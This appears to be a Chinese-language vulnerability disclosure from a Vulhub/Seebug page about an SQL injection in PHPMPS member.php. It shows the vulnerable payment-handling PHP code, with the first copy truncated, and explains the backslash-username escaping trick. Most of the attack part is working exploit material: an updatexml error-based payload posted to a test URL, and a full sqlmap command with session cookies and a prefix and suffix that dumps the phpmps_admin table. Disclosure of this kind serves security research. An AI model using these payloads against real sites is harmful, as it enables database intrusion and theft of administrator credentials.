VULHUB ™

<ul><li>/member.php</li></ul><pre class="">case 'send': $paycenter = trim($_POST['paycenter']); $contactname = trim($_POST['contactname']); $telephone = trim($_POST['telephone']); $email = trim($_POST['email']); $username = trim($_POST['username']); $orderid = trim($_POST['orderid']); $time = time(); $ip = get_ip(); $payonline_setting = get_pay_setting(); array_key_exists($paycenter, $payonline_setting) or showmsg('不存在此支付方式'); @extract($payonline_setting[$paycenter]); setcookie('paycenter', $paycenter, time() + 3600*24*365); $r = $db-&gt;getOne("SELECT payid FROM {$table}pay_online WHERE `orderid`='$orderid'"); if($r) showmsg('不要刷新'); $moneytype = 'CNY'; $amount = floatval($_POST['amount']); $trade_fee = floatval($_POST['trade_fee']); $db-&gt;query("INSERT INTO {$table}pay_online (`paycenter`,`username`,`orderid`,`moneytype`,`amount`,`trade_fee`,`contactname`,`telephone`,`email`,`sendtime`,`ip`)...

<ul><li>/member.php</li></ul><pre class="">case 'send': $paycenter = trim($_POST['paycenter']); $contactname = trim($_POST['contactname']); $telephone = trim($_POST['telephone']); $email = trim($_POST['email']); $username = trim($_POST['username']); $orderid = trim($_POST['orderid']); $time = time(); $ip = get_ip(); $payonline_setting = get_pay_setting(); array_key_exists($paycenter, $payonline_setting) or showmsg('不存在此支付方式'); @extract($payonline_setting[$paycenter]); setcookie('paycenter', $paycenter, time() + 3600*24*365); $r = $db-&gt;getOne("SELECT payid FROM {$table}pay_online WHERE `orderid`='$orderid'"); if($r) showmsg('不要刷新'); $moneytype = 'CNY'; $amount = floatval($_POST['amount']); $trade_fee = floatval($_POST['trade_fee']); $db-&gt;query("INSERT INTO {$table}pay_online (`paycenter`,`username`,`orderid`,`moneytype`,`amount`,`trade_fee`,`contactname`,`telephone`,`email`,`sendtime`,`ip`) VALUES('$paycenter','$_username','$orderid','$moneytype','$amount','$trade_fee','$contactname','$telephone','$email','$time','$ip')"); $amount = $amount + $trade_fee; require PHPMPS_ROOT.'include/payonline/'.$paycenter.'/send.php'; break; </pre><p>当用户名有“\”时，会对单引号进行转义，导致注入。</p><p>注册用户名为：asdqwe\</p><p>POST</p><pre class="">orderid=,1,1,1,1,1,1,1,1,updatexml(1,concat(0x3a,user()),1))%23&amp;paycenter=alipay</pre><p>到地址：</p><pre class="">http://10.211.55.12/phpmps/member.php?act=send</pre><p>页面返回：&nbsp;</p><p><img alt="DF59BB24-BA50-449D-80D1-BB947821ADEB.png" src="https://images.seebug.org/@/uploads/1435027694808-DF59BB24-BA50-449D-80D1-BB947821ADEB.png" data-image-size="748,117"><br></p><p>证明漏洞存在。</p><p>注册用户，用户名最后为“\”</p><p>使用SQLMAP，获取管理员的帐号密码。使用命令：</p><pre class="">python2.7 sqlmap.py -u "http://10.211.55.12/phpmps/member.php?act=send" --data="orderid=1&amp;paycenter=alipay" -p orderid --cookie="paycenter=alipay; CNZZDATA1253530733=1498703928-1426748899-%7C1426827496; CNZZDATA1670348=cnzz_eid%3D1991671050-1426825764-%26ntime%3D1426825764; CNZZDATA1257137=cnzz_eid%3D1384490666-1427173890-%26ntime%3D1427179708; bdshare_firstime=1427696533158; AVbt_2132_saltkey=VcUKu21p; AVbt_2132_lastvisit=1428561539; PHPSESSID=4d5r8l2s63nf4macaljra2pjm0" --dbms=mysql --prefix=',1,1,1,1,1,1,1,1,' --suffix=')#' -D phpmps -T phpmps_admin –dump<span style="font-family: arial, sans-serif; font-size: 16px; line-height: 1.6; background-color: transparent;">&nbsp;</span></pre><p><img alt="2F87A3A3-3F15-4DAD-B7AC-E1B180B3C136.png" src="https://images.seebug.org/@/uploads/1435027725328-2F87A3A3-3F15-4DAD-B7AC-E1B180B3C136.png" data-image-size="838,534"><br></p>